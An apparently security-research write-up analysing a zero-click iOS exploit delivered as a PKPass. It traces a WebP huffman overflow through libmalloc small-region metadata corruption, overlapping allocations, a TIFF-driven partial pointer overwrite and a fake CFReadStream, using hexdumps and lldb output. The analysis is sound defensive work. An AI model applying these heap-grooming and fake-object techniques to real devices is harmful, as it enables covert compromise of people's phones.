    In the Safari exploit writeup I described how I used different visualisation techniques to try to explore the structure of the objects, looking for patterns I could use to simplify what was going on. In this case, modifying the parser to emit well-formed curly brackets and indentation then relying on VS Code's automatic code-folding proved to work well enough for browsing around and getting a feel for the structure of the groom object.

    Sometimes the right visualisation technique is sufficient to figure out what the exploit is trying to do. In this case, where the primitive is a heap-based buffer overflow, the groom will inevitably try to put two things next to each other in memory and I want to know "what two things?"

    But no matter how long I stared and scrolled, I couldn't figure anything out. Time to try something different.

    Instrumentation

    I wrote a small helper to load the bplist using the same API as the MakerNote parser and ran it using the Mac Instruments app:

    Screenshot of Instruments app showing memory allocation with detailed information for the top three categories: 'All Heap & Anonymous...', 'CFString (store)', and 'Malloc 16.00 KiB'

    Parsing the single 5.5MB bplist causes nearly half a million allocations, churning through nearly a gigabyte of memory. Just looking through this allocation summary it's clear there's lots of CFString and CFData objects, likely used for heap shaping. Looking further down the list there are other interesting numbers:

    Memory allocation table showing 'All Heap & Anonymous...' using 990.66 MiB of total bytes, with 660.77 MiB being persistent.

    The 20'000 in the last line is far too round a number to be a coincidence. This number matches up with the number of __NSDictionaryM objects allocated:

    Table displaying memory usage broken down by allocation size, showing the number of allocations, the size of each allocation, and the total memory used for each size. In the middle of the image, there are 20000 __NSDictionaryM objects allocated.

    Finally, at the very bottom of the list there are two more allocation patterns which stand out:

    Screenshot of a table listing memory allocations with details like size, count, and total bytes, highlighting two sets of very large allocations: eighty 1MB allocations and 44 4MB ones.

    There are two sets of very large allocations: eighty 1MB allocations and 44 4MB ones.

    I modified my bplist tool again to dump out each unique string or data buffer, along with a count of how many times it was seen and its hash. Looking through the file listing there's a clear pattern:

    Object Size

    Count

    0x3FFFFF

    44

    0xFFFFF

    80

    0x3FFF

    20

    0x26A9

    24978

    0x2554

    44

    0x23FF

    5822

    0x22A9

    4

    0x1FFF

    2

    0x1EA9

    26

    0x1D54

    40

    0x17FF

    66

    0x13FF

    66

    0x3FF

    322

    0x3D7

    404

    0xF

    112882

    0x8

    3

    There are a large number of allocations which fall just below a "round" number in hexadecimal: 0x3ff, 0x13ff, 0x17ff, 0x1fff, 0x23ff, 0x3fff... That heavily hints that they are sized to fall exactly within certain allocator size buckets.

    Almost all of the allocations are just filled with zeros or 'A's. But the 1MB one is quite different:

    $ hexdump -C 170ae757_80.bin | head -n 20

    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......|

    00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....|

    00000030  b0 c3 31 16 02 00 00 00  60 e3 01 00 00 00 00 00  |..1.....`.......|

    00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............|

    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....|

    00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    *

    000004b0  00 00 00 00 00 00 00 00  10 c4 31 16 02 00 00 00  |..........1.....|

    000004c0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    *

    000004e0  02 1c 00 00 01 00 00 00  00 00 00 00 00 00 00 00  |................|

    000004f0  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000500  00 00 00 00 00 00 00 00  70 80 33 16 02 00 00 00  |........p.3.....|

    00000510  b8 b5 e5 57 02 00 00 00  ff ff ff ff ff ff ff ff  |...W............|

    00000520  58 c4 31 16 02 00 00 00  00 00 00 00 00 00 00 00  |X.1.............|

    00000530  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    *

    00000550  50 75 2c 18 02 00 00 00  01 00 00 00 00 00 00 00  |Pu,.............|

    Further on in the hexdump of the 1MB object there's clearly an NSExpression payload - this payload is also visible just running strings on the WebP file. Matthias Frielingsdorf from iVerify gave a talk at BlackHat Asia with an initial analysis of this NSExpression payload, we'll return to that at the end of this blog post.

    Equally striking (and visible in the hexdump above): there are clearly pointers in there. It's too early in the analysis to know whether this is a payload which gets rebased somehow, or whether there's a separate ASLR disclosure step.

    On a slightly higher level this hexdump looks a little bit like an Objective-C or C++ object, though some things are strange. Why are the first 24 bytes all zero? Why isn't there an isa pointer or vtable? It looks a bit like there are a number of integer fields before the pointers, but what are they? At this stage of the analysis, I had no idea.

    Thinking dynamically

    I had tried a lot to reproduce the exploit primitives on a real device; I built tooling to dynamically generate and sign legitimate PKPass files that I could send via iMessage to test devices and I could crash a lot, but I never seemed to get very far into the exploit - the iOS version range where the heap grooming works seems to be pretty small, and I didn't have an exact device and iOS version match to test on.

    Regardless of what I tried: sending the original exploits via iMessage, sending custom PKPasses with the trigger and groom, rendering the WebP directly in a test app or trying to use the PassKit APIs to render the PKPass file the best I could manage dynamically was to trigger a heap metadata integrity check failure, which I assumed was indicative of the exploit failing.

    (Amusingly, using the legitimate APIs to render the PKPass inside an app failed with an error that the PKPass file was malformed. And indeed, the exploit sample PKPass is malformed: it's missing multiple required files. But the "secure" PKPass BlastDoor parser entrypoint (PKPassSecurePreviewContextCreateMessagesPreview) is, in this regard at least, less strict and will attempt to render an incomplete and invalid PKPass).

    Though getting the whole PKPass parsed was proving tricky, with a bit of reversing it was possible to call the correct underlying CoreGraphics APIs to render the WebP and also get the EXIF/MakerNote parsed. By then setting a breakpoint when the huffman tables were allocated I had hoped it would be obvious what the overflow target was. But it was actually totally unclear what the following object was: (Here X3 points to the start of the huffman tables which are 0x3000 bytes large)

    (lldb) x/6xg $x3+0x3000

    0x112000000: 0x0000000111800000 0x0000000000000000

    0x112000010: 0x00000000001a1600 0x0000000000000004

    0x112000020: 0x0000000000000001 0x0000000000000019

    The first qword (0x111800000) is a valid pointer, but this is clearly not an Objective-C object, nor did it seem to look like any other recognizable object or have much to do with either the bplist or WebP. But running the tests a few times, there was a curious pattern:

    (lldb) x/6xg $x3+0x3000

    0x148000000: 0x0000000147800000 0x0000000000000000

    0x148000010: 0x000000000019c800 0x0000000000000004

    0x148000020: 0x0000000000000001 0x0000000000000019

    The huffman table is 0x2F28 bytes, which the allocator rounds up to 0x3000. And in both of those test runs, adding the allocation size to the huffman table pointer yielded a suspiciously round number. There's no way that's a coincidence. Running a few more tests the table+0x3000 pointer is always 8MB aligned. I remembered from some presentations on the iOS userspace allocator I'd read that 8MB is a meaningful number. Here's one from Synaktiv:

    Presentation slide from SynAckTiv explaining scalable zone memory allocation using Tiny, Small, and Large racks

    Or this one from Angelboy:

    Slide from Angelboy explaining the 'Small' memory region in libmalloc, noting its size of 0x800000 and 16319 blocks, and showing a diagram of its memory layout and linked list structure.

    8MB is the size of the iOS userspace default allocator's small rack regions. It looks like they might be trying to groom the allocator not to target application-specific data but allocator metadata. Time to dive into some libmalloc internals!

    libmalloc

    I'd suggest reading the two presentations linked above for a good overview of the iOS default userspace malloc implementation. Libmalloc manages memory on four levels of abstraction. From largest to smallest those are: rack, magazine, region and block. The size split between the tiny, small and large racks depends on the platform. Almost all the relevant allocations for this exploit come from the small rack, so that's the one I'll focus on.

    Reading through the libmalloc source I noticed that the region trailer, whilst still called a trailer, has been now moved to the start of the region object. The small region manages memory in chunks of 8MB. That 8MB gets split up in to (for our purposes) three relevant parts: a header, an array of metadata words, then blocks of 512 bytes which form the allocations:

    Diagram showing a memory layout with a small pink block on the left labeled with 'free flag bit' and '15 count bits', and dimensions '0x28 bytes'. Below it is a larger white block labeled '512 bytes'. On the right is a larger structure composed of three stacked blocks, colored green, red, and blue, with the entire structure labeled '0x8200 bytes' and '8MB'.

    The first 0x28 bytes are a header where the first two fields form a linked-list of small regions:

    typedef struct region_trailer {

            struct region_trailer *prev;

            struct region_trailer *next;

            unsigned bytes_used;

            unsigned objects_in_use;

            mag_index_t mag_index;

            volatile int32_t pinned_to_depot;

            bool recirc_suitable;

            rack_dispose_flags_t dispose_flags;

    } region_trailer_t;

    The small region manages memory in units of 512 bytes called blocks. On iOS allocations from the small region consist of contiguous runs of up to 31 blocks. Each block has an associated 16-bit metadata word called a small meta word, which itself is subdivided into a "free" flag in the most-significant bit, and a 15-bit count.

    To mark a contiguous run of blocks as in-use (belonging to an allocation) the first meta word has its free flags cleared and the count set to the number of blocks in the run. On free, an allocation is first placed on a lookaside list for rapid reuse without freeing. But once an allocation really gets freed the allocator will attempt to greedily coalesce neighbouring chunks. While in-use runs can never exceed 31 blocks, free runs can grow to encompass the entire region.

    The groom

    Below you can see the state of the meta words array for the small region directly following the one containing the huffman table as its last allocation:

    (lldb) x/200wh 0x148000028

    0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000058: 0x0000 0x0003 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000

    With some simple maths we can convert indexes in the meta words array into their corresponding heap pointers. Doing that it's possible to dump the memory associated with the allocations shown above. The larger 0x19, 0x18 and 0x1c allocations all seem to be generic groom allocations, but the two 0x3 block allocations appear more interesting. The first one (with the first metadata word at 0x14800005a, shown in yellow) is the code_lengths array which gets freed directly after the huffman table building fails. The blue 0x3 block run (with the first metadata word at 0x148000090) is the backing buffer for a CFSet object from the MakerNote and contains object pointers.

    Recall that the corruption primitive will write the dword 0x270007 0x58 bytes off the end of the 0x3000 allocation (and that allocation happens to sit directly in front of this small region). That corruption has the following effect (shown in bold):

    (lldb) x/200wh 0x148000028

    0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000058: 0x0007 0x0027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000

    It's changed the size of an in-use allocation from 3 blocks to 39 (or from 1536 to 19968 bytes). I mentioned before that the maximum size of an in-use allocation is meant to be 31 blocks, but this doesn't seem to be checked in every single free path. If things don't quite work out, you'll hit a runtime check. But if things do work out you end up with a situation like this:

    (lldb) x/200wh 0x148000028

    0x148000028: 0x0019 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000038: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000048: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027

    0x1480000a8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000b8: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x1480000c8: 0x0000 0x0000 0x0000 0x001d 0x0000 0x0000 0x0000 0x0000

    The yellow (0x8027) allocation now extends beyond its original three blocks and completely overlaps the following green (0x18) and blue (0x3) as well as the start of the purple (0x1c) allocation.

    But as soon as this corruption occurs WebP parsing fails and it's not going to make any other allocations. So what are they doing? How are they able to leverage these overlapping allocations? I was pretty stumped.

    One theory was that perhaps it was some internal ImageIO or BlastDoor specific object which reallocated the overlapping memory. Another theory was that perhaps the exploit had two parts; this first part which puts overlapping entries on the allocator freelist, then another file which is sent to exploit that? And maybe I was lacking that file? But then, why would there be that huge 1MB payload with NSExpressions in it? That didn't add up.

    Puzzling pieces

    As is so often the case, stepping back and not thinking about the problem for a while I realised that I'd completely overlooked and forgotten something critical. Right at the very start of the analysis I had run file on all the files inside the PKPass and noted that background.png was actually not a png but a TIFF. I had then completely forgotten that. But now the solution seemed obvious: the reason to use a PKPass versus just a WebP is that the PKPass parser will render multiple images in sequence, and there must be something in the TIFF which reallocates the overlapping allocation with something useful.

    Libtiff comes with a suite of tools for parsing tiff files. tiffdump displays the headers and EXIF tags:

    $ tiffdump background-15.tiff

    background-15.tiff:

    Magic: 0x4d4d <big-endian> Version: 0x2a <ClassicTIFF>

    Directory 0: offset 68 (0x44) next 0 (0)

    ImageWidth (256) SHORT (3) 1<48>

    ImageLength (257) SHORT (3) 1<16>

    BitsPerSample (258) SHORT (3) 4<8 8 8 8>

    Compression (259) SHORT (3) 1<8>

    Photometric (262) SHORT (3) 1<2>

    StripOffsets (273) LONG (4) 1<8>

    Orientation (274) SHORT (3) 1<1>

    SamplesPerPixel (277) SHORT (3) 1<4>

    StripByteCounts (279) LONG (4) 1<59>

    PlanarConfig (284) SHORT (3) 1<1>

    ExtraSamples (338) SHORT (3) 1<2>

    700 (0x2bc) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    33723 (0x83bb) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    34377 (0x8649) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    ICC Profile (34675) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    The presence of the four 15KB buffers is notable, but they seemed to mostly just be zeros. Here's the output from tiffinfo:

    $ tiffinfo -c -j -d -s -z background-15.tiff

    === TIFF directory 0 ===

    TIFF Directory at offset 0x44 (68)

      Image Width: 48 Image Length: 16

      Bits/Sample: 8

      Compression Scheme: AdobeDeflate

      Photometric Interpretation: RGB color

      Extra Samples: 1<unassoc-alpha>

      Orientation: row 0 top, col 0 lhs

      Samples/Pixel: 4

      Planar Configuration: single image plane

      XMLPacket (XMP Metadata):

      RichTIFFIPTC Data: <present>, 15347 bytes

      Photoshop Data: <present>, 15347 bytes

      ICC Profile: <present>, 15347 bytes

      1 Strips:

          0: [       8,       59]

    Strip 0:

     00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00 01 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     cd ab 34 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

     00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

    ...

    This dumps the uncompressed TIFF strip buffer and this looks much more interesting! There's clearly some structure, though not a lot of it. Is this really enough to do something useful? It looks like there could be some sort of object, but I didn't recognise the structure, and had no idea how replacing an object with this would be useful. I explored two possibilities:

    1) Alpha blending:

    This is actually the raw TIFF strip after decompression but before the rendering step which applies the alpha, so it was possible that this got rendered "on top" of another object. That seemed like a reasonable explanation for why the object seemed so sparse; perhaps the idea was to just "move" a pointer value. The first 16 bytes of the strip look like this:

    00 00 00 00 00 00 00 00 84 13 00 00 01 00 00 00

    which when viewed as two 64-bit values look like this:

    0x0000000000000000 0x0000000100001384

    It seemed sort-of plausible that rendering the 0x100001384 on top of another pointer might be a neat primitive, but there was something that didn't quite add up. This pointer-ish value is at the start of the strip buffer, so if the overlapping allocation got reallocated with this strip buffer directly, nothing interesting would happen, as the overlapping parts are further along. Maybe the overlapping buffer gets split up multiple times, but this was seeming less and less likely, and I couldn't reproduce this part of the exploit to actually observe what happened.

    2) This is an object:

    The other theory I had was that this actually was an object. The 8 zero bytes at the start were certainly strange… so then what's the significance of the next 8 bytes?

    84 13 00 00 01 00 00 00

    I tried using lldb's memory find command to see if there were other instances of that exact byte sequence occurring in a test iOS app rendering the WebP then the TIFF using the CoreGraphics APIs:

    (lldb) memory find -e 0x100001384 -- 0x100000000 0x200000000

    data not found within the range.

    Nope, plus it was very, very slow.

    One thing I had noticed was that this byte sequence was similar to one near the start of the 1MB groom object:

    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......|

    00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....|

    00000030  b0 c3 31 16 02 00 00 00  60 e3 01 00 00 00 00 00  |..1.....`.......|

    They're not identical, but it seemed a strange coincidence.

    I took a bunch of test app core dumps using lldb's process save-core command and wrote some simple code to search for similar-ish byte patterns. After some experimentation I managed to find something:

    1c7b2600  49 d2 e4 29 02 00 00 01  84 13 00 00 02 00 00 00  |I..)............|

    1c7b2610  42 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |B...............|

    1c7b2620  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    1c7b2630  c0 92 d6 83 02 00 00 00  00 93 d6 83 02 00 00 00  |................|

    Converting those coredump offsets into VM address and looking them up revealed:

    (lldb) x/10xg 0x121E47600

    0x121e47600: 0x0100000229e4d249 0x0000000200001384

    0x121e47610: 0x0000000000000042 0x0000000000000000

    0x121e47620: 0x0000000000000000 0x0000000000000000

    (lldb) image lookup --address 0x229e4d248

          Address: CoreFoundation[0x00000001dceed248] (CoreFoundation.__DATA_DIRTY.__objc_data + 7800)

          Summary: (void *)0x0000000229e4d0e0: __NSCFArray

    It's an NSCFArray, which is the Foundation (Objective-C) "toll-free bridged" version of the Core Foundation (C) CFArray type! This was the hint that I was looking for to identify the significance of the TIFF and that 1MB groom object, which also contains a similar byte sequence.

    Cores and Foundations

    Even though Apple hasn't updated the open-source version of CoreFoundation for almost a decade, the old source is still helpful. Here's what a CoreFoundation object looks like:

    /* All CF "instances" start with this structure.  Never refer to

     * these fields directly -- they are for CF's use and may be added

     * to or removed or change format without warning.  Binary

     * compatibility for uses of this struct is not guaranteed from

     * release to release.

     */

    typedef struct __CFRuntimeBase {

        uintptr_t _cfisa;

        uint8_t _cfinfo[4];

    #if __LP64__

        uint32_t _rc;

    #endif

    } CFRuntimeBase;

    So the header is an Objective-C isa pointer followed by four bytes of _cfinfo, followed by a reference count. Taking a closer look at the uses of __cfinfo:

    CF_INLINE CFTypeID __CFGenericTypeID_inline(const void *cf) {

      // yes, 10 bits masked off, though 12 bits are

      // there for the type field; __CFRuntimeClassTableSize is 1024

      uint32_t *cfinfop = (uint32_t *)&(((CFRuntimeBase *)cf)->_cfinfo);

      CFTypeID typeID = (*cfinfop >> 8) & 0x03FF; // mask up to 0x0FFF

      return typeID;

    }

    It seems that the second byte in __cfinfo is a type identifier. And indeed, running expr (int) CFArrayGetTypeID() in lldb prints: 19 (0x13) which matches up with both the object found in the coredump as well as the strange (or now not so strange) object in the TIFF strip buffer.

    X steps forwards, Y steps back

    Looking through more of the CoreFoundation code it seems that the object in the TIFF strip buffer is a CFArray with inline storage containing one element with the value 0x1234abcd. It also seems that it's possible for CF objects to have NULL isa pointers, which explains why the first 8 bytes of the fake object are zero.

    This is interesting, but it still doesn't actually get us any closer to figuring out what the next step of the exploit actually is. If the CFArray is meant to overlap with something, then what? And what interesting side-effects could having an CFArray with only a single element with the value 0x1234abcd possibly have?

    This seems like one step forward and two steps back, but there's something else which we can now figure out: what that 1MB groom object actually is. Let's take a look at the start of it again:

    00000000  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000010  00 00 00 00 00 00 00 00  80 26 00 00 01 00 00 00  |.........&......|

    00000020  1f 00 00 00 00 00 00 00  10 00 8b 56 02 00 00 00  |...........V....|

    00000030  b0 c3 31 16 02 00 00 00  48 e3 01 00 00 00 00 00  |..1.....H.......|

    00000040  20 ec 46 58 02 00 00 00  00 00 00 00 00 00 00 00  | .FX............|

    00000050  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    00000060  00 00 00 00 00 00 00 00  60 bf 31 16 02 00 00 00  |........`.1.....|

    00000070  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|

    It looks like another CF object, starting at +0x10 in the buffer with the same NULL isa pointer, a reference count of 1 and a __cfinfo of {0x80, 0x26, 0, 0}. The type identifiers aren't actually fixed, they're allocated dynamically via calls to _CFRuntimeRegisterClass like this:

    CFTypeID CFArrayGetTypeID(void) {

        static dispatch_once_t initOnce;

        dispatch_once(&initOnce, ^{ __kCFArrayTypeID = _CFRuntimeRegisterClass(&__CFArrayClass); });

        return __kCFArrayTypeID;

    }

    The CFTypeIDs are really just indexes into the __CFRuntimeClassTable array, and even though the types are allocated dynamically the ordering seems sufficiently stable that the hardcoded type values in the exploit work. 0x26 is the CFTypeID for CFReadStream:

    struct _CFStream {

        CFRuntimeBase _cfBase;

        CFOptionFlags flags;

        CFErrorRef error;

        struct _CFStreamClient *client;

        void *info;

        const struct _CFStreamCallBacks *callBacks;

        CFLock_t streamLock;

        CFArrayRef previousRunloopsAndModes;

        dispatch_queue_t queue;

    };

    Looking through the CFStream code it seems to call various callback functions during object destruction — that seems like a very likely path towards code execution, though with some significant caveats:

    Caveat I: It's still unclear how an overlapping allocation in the small malloc region could lead to a CFRelease being called on this 1MB allocation.

    Caveat II: What about ASLR? There have been some tricks in the past targeting "universal gadgets" which work across multiple slides. Nemo also had a neat objective-c trick for defeating ASLR in the past, so it's plausible that there's something like that here.

    Caveat III: What about PAC? If it's a data-only attack then maybe PAC isn't an issue, but if they are trying to JOP they'd need a trick beyond just an ASLR leak, as all forward control flow edges should be protected by PAC.

    Special Delivery

    Around this time in my analysis Matthias Frielingsdorf offered me the use of an iPhone running 16.6, the same version as the targeted ITW victim. With Matthias' vulnerable iPhone, I was able to use the Dopamine jailbreak to attach lldb to MessagesBlastDoorService and after a few tries was able to reproduce the exploit right up to the CFRelease call on the fake CFReadStream, confirming that that part of my analysis was correct!

    Collecting a few crashes led, yet again, to even more questions...

    Caveat I: Mysterious Pointers

    Similar to the analysis of the huffman tables, there was a clear pattern in the fake object pointers, which this time were even stranger than the huffman tables. The crash site was here:

    LDR    X8, [X19,#0x30]

    LDR    X8, [X8,#0x58]

    At this point X19 points to the fake CFReadStream object, and collecting a few X19 values there's a pretty clear pattern:

    0x000000075f000010

    0x0000000d4f000010

    The fake object is inside a 1MB heap allocation, but all those fake object addresses are always 16 bytes above a 16MB-aligned address. It seemed really strange to me to end up with a pointer 0x10 bytes past such a round number. What kind of construct would lead to the creation of such a pointer? Even though I did have a debugger attached to MessagesBlastDoorService, it wasn't a time-travel debugger, so figuring out the history of such a pointer was non-trivial. Using the same core dump analysis techniques I could see that the pointer which would end up in X19 was also present in the backing buffer of the CFSet described earlier. But how did it get there?

    Having found the strange CFArray inside the TIFF I was heavily biased towards believing that this must have something to do with it, so I wrote some tooling to modify the fake CFArray's in the TIFF in the exploit. The theory was that by messing with that CFArray, I could cause a crash when it was used and figure out what was going on. But making minor changes to the strip buffer didn't seem to have any effect — the exploit still worked! Even replacing the entire strip buffer with A's didn't stop the exploit working... What's going on?

    Stepping back

    I had made a list of the primitives I thought might lead to the creation of such a strange looking pointer — first on the list was a partial pointer overwrite. But then why the CFArray? But now having shown that the CFArray can't be involved, it was time to go back to the list. And step back even further and make sure I'd really looked at all of that TIFF...

    There were still those four other metadata buffers in the tiffdump output I'd shown earlier:

    700 (0x2bc) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    33723 (0x83bb) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    34377 (0x8649) BYTE (1) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    ICC Profile (34675) UNDEFINED (7) 15347<00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ...>

    I'd just dismissed them, but, maybe I shouldn't have done that? I had actually already dumped the full contents of each of those buffers and checked that there wasn't something else apart from the zeros. They were all zeros, except the third-to-last bytes which were 0x10, which I'd considered completely uninteresting. Uninteresting, unless you wanted to partially overwrite the three least-significant bytes of a little-endian pointer value with 0x000010 that is!

    Let's look back at the SMALL metadata:

    0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027

    Each of those four metadata buffers in the TIFF is 15347 bytes, which is 0x3bf3 — looked at another way that's 0x3c00 (the size rounded up to the next 0x200 block size), minus 5, minus 8.

    0x3c00 is exactly 30 0x200 byte blocks. Each 16-bit word in the metadata array shown above corresponds to one 0x200 block, where the overlapping chunk in yellow starts at 0x14800005a. Counting forwards 30 chunks means that the end of a 0x3c00 allocation overlaps perfectly with the end of the original blue three-chunk allocation:

    0x148000058: 0x0007 0x8027 0x0000 0x0000 0x0018 0x0000 0x0000 0x0000

    0x148000068: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000078: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000

    0x148000088: 0x0000 0x0000 0x0000 0x0000 0x0003 0x0000 0x0000 0x001c

    0x148000098: 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x0000 0x8027

    This has the effect of overwriting all but the last 16 bytes of the blue allocation with zeros, then overwriting the three least-significant bytes of the second-to-last pointer-sized value with 0x10 00 00; which, if that memory happened to contain a pointer, has the effect of "shifting" that pointer down to the nearest 16MB boundary, then adding 0x10 bytes! (For those who saw my 2024 Offensivecon talk, this was the missing link between the overlapping allocations and code execution I mentioned.)

    As mentioned earlier, that blue allocation starting with 0x0003 is the backing buffer of a CFSet object from the bplist inside the WebP MakerNote. The set is constructed in a very precise fashion such that the target pointer (the one to be rounded down) ends up as the second-to-last pointer in the backing buffer. The 1MB object is then also groomed such that it falls on a 16MB boundary below the object which the CFSet entry originally points to. Then when that CFSet is destructed it calls CFRelease on each object, causing the fake CFReadStream destructor to run.

    Caveat II: ASLR

    We've looked at the whole flow from huffman table overflow to CFRelease being invoked on a fake CFReadStream — but there's still stuff missing. The second open question I discussed earlier was ASLR. I had theorised that maybe it used a trick like a universal gadget, but is that the case?

    In addition to the samples, I was also able to obtain a number of crash logs from failed exploit attempts where those samples were thrown, which meant I could figure out the ASLR slide of the MessagesBlastDoorService when the exploit failed. In combination with the target device and exact OS build (also contained in the crash log) I could then obtain the matching dyld_shared_cache, subtract the runtime ASLR slide from a bunch of the pointer-looking things in the 1MB object and take a look at them.

    The simple answer is: the 1MB object contains a large number of hardcoded, pre-slid, valid pointers. There's no weird machine, tricks or universal gadget here. By the time the PKPass is built and sent by the attackers they already know both the target device type and build as well as the runtime ASLR slide of the MessagesBlastDoorService...

    Based on analysis by iVerify, as well as analysis of earlier exploit chains published by Citizen Lab, my current working theory is that the large amount of HomeKit traffic seen in those cases is likely a separate ASLR/memory disclosure exploit.

    Caveat III: Pointer Authentication

    In the years since PAC was introduced we've seen a whole spectrum of interesting ways to either defeat, or just avoid, PAC. So what did these attackers do? To understand that let's follow the CFReadStream destruction code closely. (All these code snippets are from the most recently available version of CF from 2015, but the code doesn't seem to have changed much.)

    Here's the definition of the CFReadStream:

    static const CFRuntimeClass __CFReadStreamClass = {

        0,

        "CFReadStream",

        NULL,      // init

        NULL,      // copy

        __CFStreamDeallocate,

        NULL,

        NULL,

        NULL,      // copyHumanDesc

        __CFStreamCopyDescription

    };

